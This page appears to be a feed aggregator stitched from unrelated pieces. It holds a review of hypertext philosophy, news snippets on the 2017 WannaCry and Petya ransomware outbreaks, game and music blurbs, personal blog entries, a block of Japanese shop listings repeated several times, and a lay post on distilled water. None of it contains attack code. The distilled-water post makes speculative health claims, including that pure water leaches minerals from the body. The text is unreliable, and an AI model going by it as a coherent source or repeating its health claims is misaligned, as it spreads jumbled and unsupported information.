Hypertext, at least on an impressionistic level, has the potential to foreground elements of experience that classical physics, epistemology, and maybe even the technology of the “book” erase from the scene. Hypertext is not only the form, but the subject of Kolb’s Socrates in the Labyrinth; the essay explores what the form has to offer philosophical exposition. His focus, therefore, is the nonlinearity of hypertext vis a vis the now-notorious linearity of modern philosophical argumentation. Kolb’s position is reasoned and moderate. He points out what is too often overlooked in enthusiastic discussions of electronic media: there are many kinds of nonlinearity, and not all are assisted by hypertext. Hypertext is not suitable for the organic nonlinearity of Hegelian dialectic, for example. Kolb is less clear, however, on poststructural nonlinearity, and tends to mix this discussion with the more obvious rhetorical observation that argument is not all there is to philosophical exposition. Kolb stresses hypertext’s capacity to highlight the fact that argument “is surrounded by a fluid discourse in which there are no fixed primacies and no firm meta-levels because it is in that discourse that such dependencies get established. The fluid discourse gives argument its bearings.” Although Kolb acknowledges that context - this “surrounding discourse” - and argument would be an eminently deconstructable binary, he develops the point by indirection rather than explanation: by form.

That is not necessarily a shortcoming. As a reviewer of hypertext, I find myself up against one of hypertext’s chief features: its resistance to summary (auto-incommensurability). Did I “read” the whole hypertext? I don’t know. Socrates in the Labyrinth is a complex “document” with hundreds of lexias, or reading blocks. Kolb has designed the lexia links in a variety of ways that constrain reader agency to varying degrees by embedding conditions in the choice of reader path. Since Socrates is a hypertext about hypertext, the kind of links between lexias often work reflexively, highlighting the user’s expectations and reasoning processes as she moves through the labyrinth.

As a new user of hypertext, I got a holistic feel for this form of information packaging that might have been more elusive with more experience with HTML, the utility for hypertext creation. Finding out what an author writes in hypertext is like investigating the order and completeness of a deck of cards by a game of solitaire. The combination of game rules and card order parallels the varying conditionality of lexia linkage. And it is chiefly in this formal issue that hypertext becomes relevant to Plotnitsky’s “anti-epistemology.” Plotnitsky’s exposition is not particularly linear on any level - either in terms of chapter order or the logic of exposition within chapters, and this, I think, with good reason: such a form reinforces the nonlinear experience of complementarity. Plotnitsky proposes that complementarity links the object and measuring devices in quantum physics, in turn linking quantum physics to the French poststructuralist complementarity of text and writing; following up Kolb, I would link both forms of complementarity with hypertext. In hypertext, incompleteness stalks its reader. Completeness, in fact, loses its usual correspondence to some definable totality; the concept becomes vague. Each hypertext reading differs at the very least by the choice of lexia order. And it is of course problematic to propose that two differently-ordered readings of all the lexias of a given hypertext are both “complete.” But the situation is even more complex than this; as with a game of solitaire, a hypertext reading can end in a dead end - in a pair of lexias that loop into each other with no exit options.

We come up against a kind of problem of the relative magnitude of transfinites, insofar as there is a kind of infinitude to all texts. Georg Cantor demonstrated that there are infinitely many orders of infinity by a diagonal proof that in turn became the technique used by Gödel in the demonstration of his famous Theorem. Mentioned in Kolb as well as Plotnitsky, Gödel’s undecidability implies that all systems have border problems; containment and purity cannot be obtained simultaneously. Experiencing this Gödel state in perusing hypertext, the user realizes that the linear version of text - Socrates in the Labyrinth appears as a hard-copy linear essay form in George Landow’s Hyper/Text/Theory collection - cannot save us from the whole-and-part problems made thematic in a hypertext. The boundaries of a text, as Derrida famously asserted, remain indeterminable, there is no “outside the text.” The complementarities of inside and outside, like the quantum physics complementarities of wave and particle, location and momentum, remain mutually elusive.

But hypertext would offer more potential for exploring the second consequence of quantum: the Dopplegänger effect. In hypertext, duality dogs the user at every move; it hounds all the imaginary paths not chosen; like Ts’ui Pen’s masterpiece in the Borges story, hypertext makes the existence of a garden of forking paths painfully tangible. Hypertexts like Kolb’s allow a sense of the ghostly Other like the ghost particle(s) in physics’ split beam experiments, particle(s) whose “path” depends on the choice of experimental apparatus - the choice of text, of traces, of traces of traces.

Would a work like Plotnitsky’s benefit from hypertext form? It warrants experiment. Hypertext would certainly enhance such a text by providing non-disruptive links to definitions, summaries, explanations, and sources that are all too lacking in Complementarity. As it stands, the book is inaccessible to those who haven’t yet digested Derrida and Bataille. As for Kolb, his text is fun to play with, a good introduction to the formal issues of hypertext. Its own hypertext form is also considerably more entertaining than its linear form in Landow’s collection: surely a kind of acid test. But one hopes this introduction will lead to more ambitious ventures on the order of Plotnitsky.

          International cyber attack due to ‘updated version of known virus’   
Its warning came as an international cyber attack caused disruption for major organisations.
          Experts encourage more public awareness of Russian meddling   
WASHINGTON (AP) -- The United States will get hit again by Russian cyberattacks if the country doesn&apos;t pay closer attention and work more closely with European allies who are also victims, international elections experts warned on Wednesday....
          'BradCast' 1/5/2017: (More Evidence-Free Cyberwar-Mongering; Steve Rosenfeld on a 'Hail Mary' to Stop Trump)   
Independent investigative journalism, broadcasting, trouble-making and muckraking with Brad Friedman of
          16 Multiplication Chart - A Multiplication Table   
S.O.S MATHematics home page. Do you need more help? Please post your question on our S.O.S. Mathematics CyberBoard.
          'BradCast' 8/4/2016: (Cybersecurity law expert Scott Shackelford on how U.S. might try to protect its vulnerable election system)   
Independent investigative journalism, broadcasting, trouble-making and muckraking with Brad Friedman of
          Cyberattack spreads across the globe, but its origins and purpose remain murky   

As a cyberattack continued to spread among nations and corporations on Wednesday, the identity and motives of the attackers remain a mystery.

          The Petya ransomware is starting to look like a cyberattack in disguise - The Verge   

The Verge

The Petya ransomware is starting to look like a cyberattack in disguise
The Verge
The haze of yesterday's massive ransomware attack is clearing, and Ukraine has already emerged as the epicenter of the damage. Kaspersky Labs reports that as many as 60 percent of the systems infected by the Petya ransomware were located within ...
From Ukraine with ransomware: How the global mess all beganCNET
What we know about the kill switch in Petya ransomware attackABC News
Tuesday's massive ransomware outbreak was, in fact, something much worseArs Technica
Gizmodo -The Hill -NPR -TechCrunch
all 1,430 news articles »

          New computer virus spreads from Ukraine to disrupt world business - Reuters   


New computer virus spreads from Ukraine to disrupt world business
Security experts said they believed that the goal was to disrupt computer systems across Ukraine, not extortion, saying the attack used powerful wiping software that made it impossible to recover lost data. "It was a wiper disguised as ransomware. They ...
How to protect your Windows computer from the Petya ransomware attackUSA TODAY
Ransomware Virus Hits Computer Servers across the GlobeScientific American
How to protect your Windows computer against the recent malware attackBGR
Fox News -New York Times -Adweek -The Verge
all 1,430 news articles »

          Major cyberattack sweeps globe, cripples computers -

Major cyberattack sweeps globe, cripples computers
A massive cyberattack that has locked up computers around the world continued to cause chaos on Wednesday, paralysing operations at multinationals, banks and government departments. The rapidly spreading virus, which hit Ukraine hardest on Tuesday, ...

and more »

          At least 1 US nuclear plant's computer system was hacked - ABC ... - ABC News   

Daily Beast

          New York Times: Meet WannaCry’s meaner, more clever sibling   

WannaCry, that cyberattack that captured tens of thousands of computers as well as the world’s attention last month, was certainly bad. Imagine one day discovering your work material or family photos are locked away by a hacker who wants you to transfer some Bitcoin in his direction to set it free. Read more here.

The post New York Times: Meet WannaCry’s meaner, more clever sibling appeared first on KyivPost.

 NATO specialists to help Ukraine recover from cyberattack   

NATO specialists will help Ukraine to protect itself from the consequences of massive cyber attack on corporate networks and public authorities, which occurred yesterday, June 27. This was reported by Jens Stoltenberg, the Secretary General of the North Atlantic Treaty Organization, during the press conference in Brussels, according to UNN. Read more here.

The post NATO specialists to help Ukraine recover from cyberattack appeared first on KyivPost.

          Associated Press: Cyberattackers made only $10,000   

Whoever is behind the global cyberattack centered on Ukraine, they’ve made $10,000. Read more here.

The post Associated Press: Cyberattackers made only $10,000 appeared first on KyivPost.

          Associated Press: Putin says foreign agencies attacking Russia   

Russian President Putin says foreign intelligence agencies are conducting cyberattacks against Russia. Read more here.

The post Associated Press: Putin says foreign agencies attacking Russia appeared first on KyivPost.

          Cyber war : the next threat to national security and what to do about it / Richard A. Clarke and Robert K. Knake.   
Clarke, Richard A. (Richard Alan), 1951-
          'running for fun and profit.   

netrunning that is.

android: netrunner the card game is an asymmetrical, living card game from fantasy flight games set in a dystopian (is there any other kind?) cyberpunk future where scrappy 'runners hack the corps to discover insidious corporate agendas and steal them for creds, publicity, or just for fun.

the starter box for it contains 134 cards for the corporations,114 cards for the runners, and a metric buttload of tokens for tracking various effects (no surprise there, it is a fantasy flight games product).

as a player, you take on the role of a corporation (of which there are four: haas-bioroid, nbn, jinteki, and weyland consortium) or the role of a runner (either an anarch, criminal, or shaper). each of the seven options all play very differently with regard to the victory conditions of the game, and the rules for deckbuilding allow you to customize the way your role as corp or 'runner plays. i'm sure that future releases will emphasize new corps, new runners, and tons of new tricks for each.

for the novice, ffg's android: netrunner the card game is a revision and re-imagining of netrunner, originally designed by richard garfield (of magic: the gathering fame), and released by wizards of the coast way back in 1996. even though the original game received plenty of critical acclaim, it never took off in the collectible card game community the way that m:tg did.

ffg has made a massive investment in releasing android: netrunner the card game (from here on out at little mens we're going to refer to this one as just "netrunner"). ffg's big push at gencon and the fact that they've added it to their living card game line (along with warhammer: invasion, the lord of the rings, a game of thrones, call of cthulhu, and the upcoming star wars) shows that they're pretty serious about making sure that netrunner is here to stay.

i can see this taking up a lot of my gaming time in the near future...
          International cyber attack due to ‘updated version of known virus’   
Its warning came as an international cyber attack caused disruption for major organisations.
          Guarding against hacker attacks   
The recent hacker attacks against The New York Times and Twitter are a reminder that the Internet has become a battleground for global conflict with businesses and consumers as collateral damage. It doesn’t matter whether the “Syrian Electronic Army,” which took credit for the attacks, has anything against those organizations. If its goal is to have maximum impact and get lots of attention, than going after a major media company or a highly popular social networking platform is certainly an effective tactic. No one died in these attacks and, for the most part, there is little risk of loss of life from hack attacks as long as they’re are aimed at websites or social networks. But the millions of people who depend on those services for news, information or, in some cases, their livelihoods were impacted. And it brings up worries about possible cyberattacks on our physical infrastructure, such as power or water treatment plants, hospitals, transportation systems and emergency services as well as possible disruption of banking and financial services. Security researchers have even demonstrated how it’s possible for attackers to break into home security systems or — worse — attack implanted medical devices such as pacemakers and insulin pumps, so [...]
          Inside cyber warfare / Jeffrey Carr ; foreword by Lewis Shepherd.   
Carr, Jeffrey.
          Malaysian Editors Face Cybercrime Charges for Posting a Video that Criticized Attorney General   
In the video, which was taken during a press briefing, a former member of the ruling party called for the resignation of the attorney general.
          Are mass cyber security attacks like WannaCry and Petya now the norm?    
Are mass cyber security attacks like WannaCry and Petya now the norm?

Ransomware now has to be the number one issue for governments and security experts put in charge of fighting cybercrime. In fact, it should be the top concern for anyone running a business or even anyone who owns a computer.

It has already been proven that last month’s WannaCry was not a one off. As the ‘Petya’ ransomware sweeps around the world, infecting systems in Russia, Europe, the US (and everywhere in between), IT security experts are signalling the dawn of a new era.

Farsight Security CEO Dr. Paul Vixie said: "WannaCry recently and now Petya are not the end of an era, but rather the beginning of one. The Internet security and software industries cannot keep up with the complexity of our online systems, but the bad guys certainly can. We must all stop accepting promises of safety from our vendors and start listening to our I.T. departments and other white-hatted technical experts. They are telling us that everything is broken and we have to take that to heart. Patch every day. Back up every day.”

The world is facing its second major global ransomware attack in the last two months. Many public and private firms are just getting their systems up and running again after the WannaCry virus swept across the world, infecting some 230,000 systems in an estimated 150 countries. And now, a similar ransomware attack – known as ‘Petya’ – is spreading through large firms in the US and Europe after initially hitting companies in Russia and Ukraine.

The worrying thing is that the cybercriminals appear to be (at least) one step ahead of those in charge of curbing these attacks. Mark Skilton of the Warwick Business School believes that it is time to accept the state of play and focus on preventing the attacks in the first place, rather than searching for a cure when it is already too late. "Pandora is out of the box thanks to the ironic lack of security exercised by the NSA and other agencies in looking after their stock pile of cyber weapons,” he said. "Determined individuals will get access at some point and much more needs to be done by these agencies to keep access to their cyber weapons highly secure. There is a desperate need for better governance of these digital weapons as the consequences of them escaping are severe.

He added: “Prevention is better than trying to find a complicated cure. As predicted the Wannacry attack was the first of what could be many variants of exploiting the stolen cache of NSA cyber weapons now sold on the dark web. Microsoft says its latest patches will protect computers, but this again demonstrates the lack of widespread practice by companies and users to update their systems with key virus protections."

The job at hand is in fact so difficult to manage, that even security experts are at loggerheads over what the exactly the virus is. While many are labeling – and reporting – it as the ‘Petya’ ransomeware, others are not so convinced. Skilton said that initial assessments of the attack suggest that it is on offshoot of the ‘EternalBlue plus some additional methods, which is now spreading globally and this time it has no kill switch web address’.

Meanwhile Vyacheslav Zakorzhevsky, head of anti-malware team at Kaspersky Lab said that the firm’s initial reports suggest that it is not a variant of the Petya ransomware at all. “Our preliminary findings suggest that it is not a variant of Petya ransomware as publically reported, but a new ransomware that has not been seen before,” he said. “The company’s telemetrics data indicates around 2,000 attacked users so far. Organizations in Russia and the Ukraine are the most affected, and we have also registered hits in Poland, Italy, Germany and several other countries. The attack vector is not yet known.”

Finding out what exactly this latest attack is and then stopping it, is the first most imminent job at hand. Finding a long-term prevention to ransomware attacks is the most important job at hand. In the meantime, buckle up, as there are sure to be more ransomware attacks lurking ominously round the corner.

          Microsoft looks to AI to fight malware   
Microsoft looks to AI to fight malware

Microsoft is heading into uncharted territory in its next big security update: artificial intelligence.

In a blog post, Microsoft said that the upcoming Creators Update will give Windows Defender Advanced Threat Protection a boost by using the company's cloud-based services to create an AI anti-virus to make it more effective at tackling cyberattacks.

A big feature of the AI will be to instantly pick up on any previouisly unknown malware on the computer. Microsoft will then be able to isolate the malware in the cloud and create a signature for its identity so that other users can be protected. This could completely shake up the way that companies – certainly Microsoft – deal with cyberattacks. At the moment, resarchers have to spend lots of time creating security measures to deal with issues that will already be spreading. 

The only drawback at this stage is that the new ATP security features will only be available to enterprise customers, though CNET reports that Microsoft will eventually introduce them to consumer grade systems. 

With Microsoft making this step to innovate with automated procedures it would not be a surprise to see other security vendors following suit as cyber attacks grow more varied and widespread. 

          Comment on Worldwide protest against surveillance: Freedom not Fear 2008 by JS   
Your threat are those afilliated with and in UK GCHQ. Conducting the denial of Civil, Constitutional Human rights, Transnational organised white collar cyber crime, at public expense, these sex predators abusing technology for Video voyeurism, Cyb r surveillance ID/IP theft, Data mining, Cyber terrorism, exploit the public for information warfare As a 20 year subject of abuse, having operational methods, names, Fed law violations, evidence, the people are global threats to security and safety Unless this issue is confronted in Cours of law, arrests, prosecutions, imprisonment done, the people will deny basic human rights to this and next generation Willing to speak against abuse of power
          6 / 15 / 2013 upDaTe   
6 / 15 / 2013
Adam Yngstrom
Feels Like Home
(Original Mix)
Adam Yngstrom
Break Loose
(Original Mix)
Adam Yngström
The Way Back
(Original Mix)
Adam Yngström 
Haninge, Sweden

Born in Stockholm, Sweden, in 1993. There are not a lot of words to spend on him. He lets the music speak for him. And the music speaks quite good like we can see his own remix of Calvin Harris next hit "Sweet Nothing" was downloaded more than 20000 times unofficially on the net. Adam is a bomb ready to explode, so, get ready!
Max Rocca
(Original Mix)
 Max Rocca 
Paris, France

Max Rocca from Paris has made a big start into production over the past five years, with support from big guns like Carl Cox, Tiesto, Paul Oakenfold, Scumfrog, Axwell, Voltax, Mike Kelly, JJ Mullor, Markus Schulz, Alan X, Hildegard (Sunshine Live), Niki Belucci (FG), Fabio White, Neroli, Sean Finn, tyDi, Ivan Pica, Ben Manson, Chris Bekker Cyberbeat FM, Berlin FM. He's been remixed by the likes of Dean Newton and Thomas Penton, and found a home on labels including Elektrify Records, High Intensity Records, Sorry Shoes, Shute, Saint Tropez Records, FilthBox, Hypetraxx, Njoy, We Continue Digital.
(The Chainsmokers Remix)
Los Angeles, United States

 Tjernberg & Wess
(Original Mix)

          And Now ......   
...... the original subject that I was going to post about Thursday night.

When last I left you I had updated you about Jack and told you the story of my trip to the grocery store on Wednesday.

On Thursday morning I had my first orthodontic appointment in 2 months.  I've been wearing my braces only at night, which has been a lot easier than wearing them all day long.
Plus, the last time I went in, my ortho took off the attachments that he had glued to my teeth months ago.  Those horrible bumpy things that made raw spots on the inside of my cheeks ..... unless I had the braces on.
I was much relieved.

So on this visit, I got the next set of braces, plus 7 (SEVEN) new attachments glued to my teeth.  You know, to replace the 3 I had before.
Yeah, more raw spots, new tight braces that I get to wear 22-23 hours a day.

After my appointment I met up with my lovely friend/real estate agent so that she could show me a house that just came on the market in the neighborhood that I like.
I really like the neighborhood, but still don't know if I want to stay in Houston or not.  I guess I'm keeping my options open.

After seeing the house, I went back home and threw several things into a suitcase.  Since I was leaving town I did what I usually do:  locked a closet door and locked my bedroom door.  I didn't always do this, but ever since we had an "event" at the end of May last year (think "Risky Business" without the hookers) while I was out of town, I now take precautions.

Son #2 drove me to the airport, where I caught a flight to Tulsa.  Vicki picked me up, along with her daughter C.  We went to dinner and then to their house to relax for the evening.
I went to bed around midnight.
At around 1:30 a.m. my cell phone rang.  It was from Son #2.
Here's the gist of our conversation:
Me:  "Hello?"
S2:  "Hey.  How's it going?"
Me:  "Ummmmm, fine.  Why are you calling at 1:30 a.m.?"
S2::  And here's the whole reason for this post ........
       "Ummmm ...... how do you unlock your bedroom door?"
Me:  "With the key.  That's with me. Why?"
S2:  "The cats are locked in your room."
Me:  -silence, followed by ..... "Are you kidding?"
S2:  "Nope.  Theyre' in there.  Should I use a knife and take the door knob off?"
Me: "No!  Don't break the door knob.  Can you use a screw driver and remove it that way?"
S2:  "Nope.  There aren't any screws."
Me:  "What about sliding the bolts out of the hinges?  Wait, those are on the inside, aren't they?"
S2"  "Yep.  On the inside.  I can use a knife and get it off."
Me:  "No!  Don't use a knife.  What about that credit card thing .... where you slide it between the door  and the door frame?"
S2:  --after trying the credit card thing-- "Nope.  That's not going to work."
Me:  "Well, I don't know what to tell you.  Are you sure they're in there?"
S2:   "Yes.  You're not coming back until Tuesday.  They're going to die in there."
Me:  "Nah, they won't die.  Unless they eat each other."
S2:  "Not funny."
Me:  "OK, in the morning call a lock smith.  Here's the name of one I've used before:  ______.  Keep me posted."
S2:  "OK.

He called the locksmith the next morning.  The guy came out and had to break the lock to get it open.
Yep, I could've saved $85 and let Son #2 do that the night before.
Oh well, the cats were released.
Even better ..... by some miracle neither of them ate each other, or pooped or peed in my room.  So yay for that.
It's been an emotional week, feline-wise.

As I mentioned earlier, a cyber vet friend set up a page so that people could help with the expenses of fixing Jack (  I was, and am, very grateful and humbled by her actions and by the actions of others who have donated to that page.  It's not something I would've done. Ever.
But then I wouldn't have seen the amazing kindness of family, friends and complete strangers.
So thank you to her and to everyone who's wanted to help, and has ..... with good thoughts, prayers, comments and donations.

In other news of wonderfully amazing support, SS received a grant Thursday ...... money to support our Regional Groups program.  A camper nominated us for it.  And every one of us on the Board was stunned.  And a couple of us cried,  Including me.

On the flip side ...... I received a text message from my bank on Friday.  I didn't trust a text message so I called them.  The text message was the real deal.
It seems that my credit card # has been stolen ...... for the third time in 6 months or so.

Now one credit card is dead and the other is pretty much full of vet bills.
But at least my bank doesn't make me pay for purchases that I didn't make.
Like three consecutive purchases at Target ...... each for between 2 and 3 hundred dollars.

So tomorrow I get to try to remember which accounts/bills I have on auto pay and hopefully get them all updated before they find out that the credit card I've used is now useless.  For the third time.  But I said that earlier.

Anyway ...... that's about it ..... I think.  Vicki and I are relaxing at her lake condo, which is beautiful and a wonderfully quiet space.
Of course as I wrote about the credit card, I remembered that it's being sent to her house tomorrow via FedEx and they'll require a signature.
Of course.

So our lake trip will end before we had planned.  And hopefully we won't miss the FedEx man/person.

I think I may have caught you all up now.
But don't quote me.
Because things tend to change over night.
Or second by second.

But life is good.
Before I forget, I had a great visit with Son #3 this morning.  He's very happy at school.
That makes me happy.
But boy, do I miss him.
And yes, I cried again today as we drove away from him.
But I'm glad and relieved that he's happy and doing so very well.
Did I mention that he's the president of his pledge class?
No, I didn't, but now I have.
In case you can't tell ...... I'm very proud of him.

I head back to NY on Thursday and I can't wait.
Oliver is going with me.
Which should make things very interesting.
Please join me in praying that he, and Jack, hate windows.

OK, Peeps.
That's it for now.
For however long "now" lasts.

I hope you had a good weekend.
Do me a favor, boycot Sports Illustrated.
For their lack of journalistic integrity.
That, and the fact that they print stories by someone who's been fired for writing lies in the past.
More than once.

That's all I'm going to say about that.
At least for now.

Happy Sunday/Monday, Peeps.

          A Post Is Coming ......   
...... that you're not going to believe.
Unless you're a long-time reader, or even a medium-time reader.
Then you're going to totally believe it.

Some publishing company is missing out on huge bucks by not offering me a book contract, just based on this blog.

Because honestly, I can NOT make this stuff up.

So ..... yeah.
That's all you're getting right now.
I'm such a tease.


A tease who needs some time to write a post.

Wait for it ..........

Happy Friday, Peeps!

P.S.  Jack is doing better and will be transferred to the ASPCA at any moment, where they will (hopefully) do the surgery on his jaw for WAY less than the previous hospital.  No one in NY will look at records and give you an estimate.
It seems they want you to walk through the doors with the animal so that can then charge you an automatic fee.
I kid you not.

In other, yet related, news ...... an amazingly kind cyber friend, who is a vet, has started a FB page for Jack, to help off set the cost of all of this.
I know you've read this before, and some of you have even heard it in person, but ......
Truly.  The kindness that pours out of people is nothing less than amazing and beautiful.

P.P.S.  I'll comment more on another event that just occurred that also shows the amazingly beautiful kindness of strangers.

P.P.P.S.  DANG, I need more time!!!
: )
          Cyber attaque : «wannacry» cède la place à «Peyta»   
Un virus dénommé «Peyta» est à l’origine d’une nouvelle panique mondiale. En effet, une nouvelle cyber attaque s’est produite, mardi 27 juin 2017, deux mois seulement après celui de «wannacry»  qui avait sévi dans plus de 150 pays .  Ce nouveau virus «ransomware» dénommé «Peyta» qui chiffre le contenu d’un ordinateur pour le rendre inutilisable jusqu’au paiement […]
【送料380円】【0603激安】【新品】 メッシュポーチミクロ ブルー (GBA)GBA スーパーマリオボール考える力を身につける小学生向けのパソコン用学習ソフト!CD-ROM□いアタマを○くする。国語Jr.(新品)GBA ロックマン ゼロ4【中古】ファミコンミニ クルクルランド【GBA】みんなのソフトシリーズテトリス【伝説のスタフィー2】(中古GBA)ONE PIECE ドラゴンドリーム!【中古】GBA エッグマニア つかんで!まわして!どっすんぱず~る!!≪中古GBA≫ファイアーエムブレム烈火の剣【箱イタミ】【テトリスワールド】GBA【送料380円】【0603激安】【新品】 ロックマン ゼロ4 (GBA)【GBA】くにおくん熱血コレクション1ロケットカンパニーゲームボーイアドバンスソフトガチャステ!ダイナデバイス2フェニックスサモンナイトクラフトソード物語はじまりの石(中古GBA)【新作予約】GBA ファイナルファンタジータクティクスアドバンス[アルティメットヒッツ] 〈06...メイド イン ワリオ【送料無料】ゲームボーイアドバンスGBA パックマンコレクション【バリューセレクション】(新品)GBA 真・女神転生デビルチルドレン 闇の書カプコンゲームボーイアドバンスソフトロックマンエグゼ バトルチップGPゲームボーイアドバンス「Dr.MARIOとパネルでポン」【新品】GBA アストロボーイ鉄腕アトム ~アトムハートの秘密~【GBA】CYBER・USB充電ケーブル(ミクロ用) 【GBA】ファイアーエムブレム聖魔の光石≪中古GBA≫スーパーロボット大戦A【新品・GBA】Z.O.E 2173メッシュポーチミクロ ブラック【真型メダロット クワガタバージョン】GBA*未使用新品ファイナルファンタジーIVアドバンス【送料380円】【0603激安】【新品】 絶体絶命でんぢゃらすじーさん痛 ~怒りのおしおきブルース...【送料380円】【0603激安】【新品】 メッシュポーチミクロ ブルー (GBA)GBA スーパーマリオボール考える力を身につける小学生向けのパソコン用学習ソフト!CD-ROM□いアタマを○くする。国語Jr.(新品)GBA ロックマン ゼロ4【中古】ファミコンミニ クルクルランド【GBA】みんなのソフトシリーズテトリス【伝説のスタフィー2】(中古GBA)ONE PIECE ドラゴンドリーム!【中古】GBA エッグマニア つかんで!まわして!どっすんぱず~る!!≪中古GBA≫ファイアーエムブレム烈火の剣【箱イタミ】【テトリスワールド】GBA【送料380円】【0603激安】【新品】 ロックマン ゼロ4 (GBA)【GBA】くにおくん熱血コレクション1ロケットカンパニーゲームボーイアドバンスソフトガチャステ!ダイナデバイス2フェニックスサモンナイトクラフトソード物語はじまりの石(中古GBA)【新作予約】GBA ファイナルファンタジータクティクスアドバンス[アルティメットヒッツ] 〈06...メイド イン ワリオ【送料無料】ゲームボーイアドバンスGBA パックマンコレクション【バリューセレクション】(新品)GBA 真・女神転生デビルチルドレン 闇の書カプコンゲームボーイアドバンスソフトロックマンエグゼ バトルチップGPゲームボーイアドバンス「Dr.MARIOとパネルでポン」【新品】GBA アストロボーイ鉄腕アトム ~アトムハートの秘密~【GBA】CYBER・USB充電ケーブル(ミクロ用) 【GBA】ファイアーエムブレム聖魔の光石≪中古GBA≫スーパーロボット大戦A【新品・GBA】Z.O.E 2173メッシュポーチミクロ ブラック【真型メダロット クワガタバージョン】GBA*未使用新品ファイナルファンタジーIVアドバンス【送料380円】【0603激安】【新品】 絶体絶命でんぢゃらすじーさん痛 ~怒りのおしおきブルース...【送料380円】【0603激安】【新品】 メッシュポーチミクロ ブルー (GBA)GBA スーパーマリオボール考える力を身につける小学生向けのパソコン用学習ソフト!CD-ROM□いアタマを○くする。国語Jr.(新品)GBA ロックマン ゼロ4【中古】ファミコンミニ クルクルランド【GBA】みんなのソフトシリーズテトリス【伝説のスタフィー2】(中古GBA)ONE PIECE ドラゴンドリーム!【中古】GBA エッグマニア つかんで!まわして!どっすんぱず~る!!≪中古GBA≫ファイアーエムブレム烈火の剣【箱イタミ】【テトリスワールド】GBA【送料380円】【0603激安】【新品】 ロックマン ゼロ4 (GBA)【GBA】くにおくん熱血コレクション1ロケットカンパニーゲームボーイアドバンスソフトガチャステ!ダイナデバイス2フェニックスサモンナイトクラフトソード物語はじまりの石(中古GBA)【新作予約】GBA ファイナルファンタジータクティクスアドバンス[アルティメットヒッツ] 〈06...メイド イン ワリオ【送料無料】ゲームボーイアドバンスGBA パックマンコレクション【バリューセレクション】(新品)GBA 真・女神転生デビルチルドレン 闇の書カプコンゲームボーイアドバンスソフトロックマンエグゼ バトルチップGPゲームボーイアドバンス「Dr.MARIOとパネルでポン」【新品】GBA アストロボーイ鉄腕アトム ~アトムハートの秘密~【GBA】CYBER・USB充電ケーブル(ミクロ用) 【GBA】ファイアーエムブレム聖魔の光石≪中古GBA≫スーパーロボット大戦A【新品・GBA】Z.O.E 2173メッシュポーチミクロ ブラック【真型メダロット クワガタバージョン】GBA*未使用新品ファイナルファンタジーIVアドバンス【送料380円】【0603激安】【新品】 絶体絶命でんぢゃらすじーさん痛 ~怒りのおしおきブルース...
          Cyberattacken - Wir müssen schnell handeln   
Anti-Virensoftware soll Anwender vor Viren, Trojanern und anderen digitalen Schädlinge schützen (imago )Innerhalb von zwei Monaten haben zwei Trojaner die Rechner vieler großer Unternehmen weltweit angegriffen. Unsere Infrastruktur sei viel zu anfällig für solche Attacken, meint Peter Welchering. Doch die Sicherheitsbehörden sträubten sich gegen die Schließung der Sicherheitslücken - denn damit würde man ihnen ihr Lieblingsspielzeug wegnehmen.

Von Peter Welchering, Kommentare und Themen der Woche
Hören bis: 06.09.2017 19:08
Direkter Link zur Audiodatei

          Is Drinking Distilled Water Dangerous?   

Note: I'm not a doctor, zealot, or trying to sell anything - I'm just a regular guy summarizing all the research I did on this topic.
There seems to be a lot of controversy about what kind of water people should be drinking and cooking their food with:
  • tap water
  • natural "spring" or "rain" water
  • filtered, reverse-osmosis, or other cleansed/purified/low-mineral water
  • distilled water
The controversy is about the good & bad components in water. There are a number of good minerals found in "mineralized" water sources including:
  • calcium
  • magnesium
  • potassium
  • sodium
There are also a number of bad components that might be found in water ( whether its bottled or not )
  • lead , mercury, and other unhealthy heavy metals
  • bacteria & other live matter
  • man-made chemicals like plastics, medicines
There is a wide range of waters, in terms of purity. On the one extreme is distilled water, which should contain absolutely nothing but H2O. On the other extreme is "hard water" which contains a large amount of minerals (and possibly chemicals). There are many types of water in between, some that have only a small amounts, or just a subset of the minerals in question.

The "total dissolved solids" (TDS) is a measure of how much stuff (typically good minerals) is in your water. Highly-purified water (distilled, reverse-osmosis, other highly-filtered) has a TDS well below 50mg/liter. Distilled water ought to have TDS=0. "Hard water" or mineralized water often has TDS > 200. The debate is about which is healthier: low-TDS water, or high-TDS water. Below are the common arguments that come up, and my take on them.

"Distilled/highly-purified water is missing essential minerals that your body needs."
The amount of minerals in normal water is very small compared to the amount found in food (less than 10%). A humorous thought experiment mentioned here was to imagine a blender with a day's worth of food and consider the tiny difference in minerals between adding distilled water to this, or regular water. However, some argue that the calcium/magnesium/etc... in water is more easily absorbed by your body than from food or supplements.
I think this may be more important of an issue if you are already low on these minerals, and don't get enough of them from other sources (eg. eating nutritious food, cooking with tap water, drinking other liquids like orange juice, etc...)

"Purified water can "leach" metals and other bad chemicals from the pipes and containers."
Apparently, pure/low-mineral water is chemically "unstable" and wants to dissolve away the materials around it. If you store your (pure) water for a long amount of time, or get it through pipes that haven't been setup to do so, this is something you should think about.
Overall, this is really a contamination issue though, not about how distilled water affects your body. I just wanted to mention it for completeness.

"Purified water leaches vital minerals & ions from your body."
It stands to reason that if you drink distilled water, and urinate any of these vital minerals, that there is a net loss. I get the impression that the dissolving/extracting power of distilled water is very high, and that drinking it will draw out many good chemicals (in addition to the bad impurities) from your body. Perhaps distilled water is less dangerous when drank with a meal? I've read claims that distilled water is particularly bad during exercise (presumably because that is when your body needs those electrolytes the most).
Frustratingly, there doesn't seem to be much research on this. Would it be that hard to measure the amount of these chemicals in the urine of distilled water drinkers compared to normal?

Then why do people drink distilled water?
  • to avoid all the bad chemicals that might be found in tap water
  • they like the taste (as I do)
  • to extract and remove toxic substances from your body
I understand the inclination to avoid tap water (that's a whole controversy of its own) - but good bottled water can achieve this goal. As far as taste, this is a personal matter, but presumably everyone could find a non-distilled alternative that they like (as I am going to do now) for drinking on a daily basis. If you have a particular need to remove impurities from your body, I think distilled water is safe & effective in doing so, understanding that it may remove good materials from your body as well. I've also read that activated charcoal has been used for the same purpose.

So, what water should I be drinking?
I have no idea :) How ironic is it that modern man cannot answer such a simple question, when drinking water is something that every life form on Earth was born from?
If you believe all the evidence in the references below, you should be drinking water with a high TDS (lots of calcium, magnesium, and other good stuff), that doesn't have toxic metals or chemicals.
There doesn't seem to be any specific health benefit from distilled water except for avoiding bad chemicals. From what I've read, the only "danger" with drinking reasonable amounts of distilled water is the long-term mineral-deficiency it might cause in your body. But maybe our Western diets & lifestyles are already so deficient in these minerals that distilled water exacerbates it?
